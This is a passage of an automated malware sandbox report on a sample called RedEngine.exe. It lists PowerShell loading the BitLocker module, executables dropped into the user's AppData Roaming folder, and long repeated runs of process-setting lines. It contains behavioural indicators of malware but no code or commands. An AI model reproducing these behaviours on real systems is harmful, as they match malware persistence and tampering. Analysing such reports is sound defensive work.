                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB019B41F0 IsIconic,IsZoomed,AdjustWindowRectEx,SendMessageW,SendMessageW,GetSystemMetrics,MoveWindow,GetWindowRect,GetClientRect,MoveWindow,GetWindowRect,MoveWindow,DrawMenuBar,31_2_00007FFB019B41F0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5C41F0 IsIconic,IsZoomed,AdjustWindowRectEx,SendMessageW,SendMessageW,GetSystemMetrics,MoveWindow,GetWindowRect,GetClientRect,MoveWindow,GetWindowRect,MoveWindow,DrawMenuBar,42_2_00007FFB1C5C41F0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_00007FF741BC6EA0
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
